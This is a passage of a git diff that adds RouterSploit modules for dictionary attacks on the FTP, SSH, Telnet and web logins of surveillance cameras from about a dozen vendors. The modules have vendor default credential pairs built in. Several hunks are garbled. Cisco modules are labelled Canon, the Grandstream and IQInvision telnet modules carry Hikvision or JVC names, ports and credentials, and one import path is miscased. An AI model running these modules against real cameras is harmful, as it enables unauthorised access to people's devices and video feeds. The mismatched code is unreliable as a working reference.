OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/canon/__init__.py b/routersploit/modules/creds/cameras/canon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/canon/ftp_default_creds.py b/routersploit/modules/creds/cameras/canon/ftp_default_creds.py new file mode 100644 index 000000000..d0ad1cf2c --- /dev/null +++ b/routersploit/modules/creds/cameras/canon/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Canon Camera Default FTP Creds", + "description": "Module performs dictionary attack against Canon Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Canon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:camera", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/canon/ssh_default_creds.py b/routersploit/modules/creds/cameras/canon/ssh_default_creds.py new file mode 100644 index 000000000..aa800eb84 --- /dev/null +++ b/routersploit/modules/creds/cameras/canon/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Canon Camera Default SSH Creds", + "description": "Module performs dictionary attack against Canon Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Canon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:camera", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/canon/telnet_default_creds.py b/routersploit/modules/creds/cameras/canon/telnet_default_creds.py new file mode 100644 index 000000000..aabc03fd8 --- /dev/null +++ b/routersploit/modules/creds/cameras/canon/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Canon Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Canon Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Canon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:camera", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py b/routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..469df9c1f --- /dev/null +++ b/routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault + + +class Exploit(HTTPBasicDigestDefault): + __info__ = { + "name": "Canon Camera Default Web Interface Creds - HTTP Auth", + "description": "Module performs dictionary attack against Canon Camera Web Interface. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Canon Camera" + ) + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)") + port = OptPort(80, "Target HTTP port") + path = OptString("/admin/index.html", "Target Path") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/cisco/__init__.py b/routersploit/modules/creds/cameras/cisco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/cisco/ftp_default_creds.py b/routersploit/modules/creds/cameras/cisco/ftp_default_creds.py new file mode 100644 index 000000000..f8a13285c --- /dev/null +++ b/routersploit/modules/creds/cameras/cisco/ftp_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Cisco Camera Default FTP Creds", + "description": "Module performs dictionary attack against Cisco Camera FTP service.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Cisco Camera", + ] + } + + target = OptIP("", "Taret IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + + diff --git a/routersploit/modules/creds/cameras/cisco/ssh_default_creds.py b/routersploit/modules/creds/cameras/cisco/ssh_default_creds.py new file mode 100644 index 000000000..802547671 --- /dev/null +++ b/routersploit/modules/creds/cameras/cisco/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Canon Camera Default SSH Creds", + "description": "Module performs dictionary attack against Canon Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin BUyr ", + ], + "devices": [ + "Canon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/cisco/telnet_default_creds.py b/routersploit/modules/creds/cameras/cisco/telnet_default_creds.py new file mode 100644 index 000000000..e1d10c7c1 --- /dev/null +++ b/routersploit/modules/creds/cameras/cisco/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Canon Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Canon Camera Telnet service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", + ], + "devices": [ + "Canon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/dlink/__init__.py b/routersploit/modules/creds/cameras/dlink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/dlink/ftp_default_creds.py b/routersploit/modules/creds/cameras/dlink/ftp_default_creds.py new file mode 100644 index 000000000..fd5fd26b8 --- /dev/null +++ b/routersploit/modules/creds/cameras/dlink/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "D-Link Camera Default FTP Creds", + "description": "Module performs dictionary attack against D-Link Camera FTP service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "D-Link Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/dlink/ssh_default_creds.py b/routersploit/modules/creds/cameras/dlink/ssh_default_creds.py new file mode 100644 index 000000000..16ee0686c --- /dev/null +++ b/routersploit/modules/creds/cameras/dlink/ssh_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "D-Link Camera Default SSH Creds", + "description": "Module performs dictionary attack against D-Link Camera SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", + ], + "devices": [ + "D-Link Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/cameras/dlink/telnet_default_creds.py b/routersploit/modules/creds/cameras/dlink/telnet_default_creds.py new file mode 100644 index 000000000..196c84d5f --- /dev/null +++ b/routersploit/modules/creds/cameras/dlink/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "D-Link Camera Default Telnet Creds", + "description": "Module performs dictionary attack against D-Link Camera Telnet service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "D-Link Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/geovision/__init__.py b/routersploit/modules/creds/cameras/geovision/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/geovision/ftp_default_creds.py b/routersploit/modules/creds/cameras/geovision/ftp_default_creds.py new file mode 100644 index 000000000..b754ff9ce --- /dev/null +++ b/routersploit/modules/creds/cameras/geovision/ftp_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "GeoVision Camera Default FTP Creds", + "description": "Module performs dictioanry attack against GeoVision Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "GeoVision Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/cameras/geovision/ssh_default_creds.py b/routersploit/modules/creds/cameras/geovision/ssh_default_creds.py new file mode 100644 index 000000000..ff107f866 --- /dev/null +++ b/routersploit/modules/creds/cameras/geovision/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_Default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "GeoVision Camera Default SSH Creds", + "description": "Module performs dictionary attack against GeoVision Camera SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "GeoVision Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + threads = OptInteger(1, "Number of threads") diff --git a/routersploit/modules/creds/cameras/geovision/telnet_default_creds.py b/routersploit/modules/creds/cameras/geovision/telnet_default_creds.py new file mode 100644 index 000000000..057b5bbc0 --- /dev/null +++ b/routersploit/modules/creds/cameras/geovision/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "GeoVision Camera Default Telnet Creds", + "description": "Module performs dictionary attack against GeoVision Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "GeoVision Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/grandstream/__init__.py b/routersploit/modules/creds/cameras/grandstream/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/grandstream/ftp_default_creds.py b/routersploit/modules/creds/cameras/grandstream/ftp_default_creds.py new file mode 100644 index 000000000..64243abac --- /dev/null +++ b/routersploit/modules/creds/cameras/grandstream/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Grandstream Camera Default FTP Creds", + "description": "Module performs dictionary attack against Grandstream Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Grandstream Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/grandstream/ssh_default_creds.py b/routersploit/modules/creds/cameras/grandstream/ssh_default_creds.py new file mode 100644 index 000000000..692cec1ec --- /dev/null +++ b/routersploit/modules/creds/cameras/grandstream/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Grandstream Camera Default SSH Creds", + "description": "Module performs dictionary attack against Grandstream Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Grandstream Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/grandstream/telnet_default_creds.py b/routersploit/modules/creds/cameras/grandstream/telnet_default_creds.py new file mode 100644 index 000000000..793691538 --- /dev/null +++ b/routersploit/modules/creds/cameras/grandstream/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Grandstream Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Grandstream Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Hikvision Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/hikvision/ssh_default_creds.py b/routersploit/modules/creds/cameras/hikvision/ssh_default_creds.py new file mode 100644 index 000000000..07430e7cf --- /dev/null +++ b/routersploit/modules/creds/cameras/hikvision/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Hikvision Camera Default SSH Creds", + "description": "Module performs dictionary attack against Hikvision Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Hikvision Camera" + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/hikvision/telnet_default_creds.py b/routersploit/modules/creds/cameras/hikvision/telnet_default_creds.py new file mode 100644 index 000000000..db565b954 --- /dev/null +++ b/routersploit/modules/creds/cameras/hikvision/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Hikvision Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Hikvision Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Hikvision Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/honeywell/__init__.py b/routersploit/modules/creds/cameras/honeywell/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/honeywell/ftp_default_creds.py b/routersploit/modules/creds/cameras/honeywell/ftp_default_creds.py new file mode 100644 index 000000000..58d0f34b2 --- /dev/null +++ b/routersploit/modules/creds/cameras/honeywell/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Honeywell Camera Default FTP Creds", + "description": "Module performs dictionary attack against Honeywell Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Honeywell Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py b/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py new file mode 100644 index 000000000..5bafee09a --- /dev/null +++ b/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Honeywell Camera Default SSH Creds", + "description": "Module performs dictionary attack against Honeywell Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Honeywell Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/honeywell/telnet_default_creds.py b/routersploit/modules/creds/cameras/honeywell/telnet_default_creds.py new file mode 100644 index 000000000..b82d2c56b --- /dev/null +++ b/routersploit/modules/creds/cameras/honeywell/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Honeywell Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Honeywell Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Honeywell Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/iqinvision/__init__.py b/routersploit/modules/creds/cameras/iqinvision/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/iqinvision/ftp_default_creds.py b/routersploit/modules/creds/cameras/iqinvision/ftp_default_creds.py new file mode 100644 index 000000000..2116c0a79 --- /dev/null +++ b/routersploit/modules/creds/cameras/iqinvision/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "IQInvision Camera Default FTP Creds", + "description": "Module performs dictionary attack against IQInvision Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "IQInvision Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:system", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/iqinvision/ssh_default_creds.py b/routersploit/modules/creds/cameras/iqinvision/ssh_default_creds.py new file mode 100644 index 000000000..3c688dd06 --- /dev/null +++ b/routersploit/modules/creds/cameras/iqinvision/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "IQInvision Camera Default SSH Creds", + "description": "Module performs dictionary attack against IQInvision Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "IQInvision Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:system", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/iqinvision/telnet_default_creds.py b/routersploit/modules/creds/cameras/iqinvision/telnet_default_creds.py new file mode 100644 index 000000000..51607d940 --- /dev/null +++ b/routersploit/modules/creds/cameras/iqinvision/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "IQInvision Camera Default Telnet Creds", + "description": "Module performs dictioanry attack against IQInvision Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "JVC Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:jvc", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/jvc/ssh_default_creds.py b/routersploit/modules/creds/cameras/jvc/ssh_default_creds.py new file mode 100644 index 000000000..ced1624fa --- /dev/null +++ b/routersploit/modules/creds/cameras/jvc/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "JVC Camera Default SSH Creds", + "description": "Module performs dictionary attack against JVC Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "JVC Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:jvc", "User:pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/jvc/telnet_default_creds.py b/routersploit/modules/creds/cameras/jvc/telnet_default_creds.py new file mode 100644 index 000000000..ef52e5c92 --- /dev/null +++ b/routersploit/modules/creds/cameras/jvc/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "JVC Camera Default Telnet Creds", + "description": "Module performs dictionary attack against JVC Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "JVC Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:jvc", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/mobotix/__init__.py b/routersploit/modules/creds/cameras/mobotix/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py b/routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py new file mode 100644 index 000000000..a7a20c0e3 --- /dev/null +++ b/routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Mobotix Camera Default FTP Creds", + "description": "Module performs dictionary attack against Mobotix Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mobotix Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:meinsm", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py b/routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py new file mode 100644 index 000000000..2ab324510 --- /dev/null +++ b/routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Mobotix Camera Default SSH Creds", + "description": "Module performs dictionary attack against Mobotix Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mobotix Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:meinsm", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/mobotix/telnet_default_creds.py b/routersploit/modules/creds/cameras/mobotix/telnet_default_creds.py new file mode 100644 index 000000000..25acd246e --- /dev/null +++ b/routersploit/modules/creds/cameras/mobotix/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Mobitix Camer Default Telnet Creds", + "description": "Module performs dictionary attack against Mobitix Camera Telnet service. " + "If valid credentials are found, they are displayed tot he user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mobotix Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:meinsm", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/samsung/__init__.py b/routersploit/modules/creds/cameras/samsung/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/samsung/ftp_default_creds.py b/routersploit/modules/creds/cameras/samsung/ftp_default_creds.py new file mode 100644 index 000000000..2ec11c51b --- /dev/null +++ b/routersploit/modules/creds/cameras/samsung/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Samsung Camera Default FTP Creds", + "description": "Module performs dictionary attack against Samsung Camer FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Samsung Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1111111,admin:4321,root:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/samsung/ssh_default_creds.py b/routersploit/modules/creds/cameras/samsung/ssh_default_creds.py new file mode 100644 index 000000000..605818e33 --- /dev/null +++ b/routersploit/modules/creds/cameras/samsung/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Samsung Camera Default SSH Creds", + "description": "Module perfroms dictionary attack against Samsung Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Samsung Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1111111,admin:4321,root:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/samsung/telnet_default_creds.py b/routersploit/modules/creds/cameras/samsung/telnet_default_creds.py new file mode 100644 index 000000000..e353df098 --- /dev/null +++ b/routersploit/modules/creds/cameras/samsung/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Samsung Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Samsung Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Samsung Camera", + ] 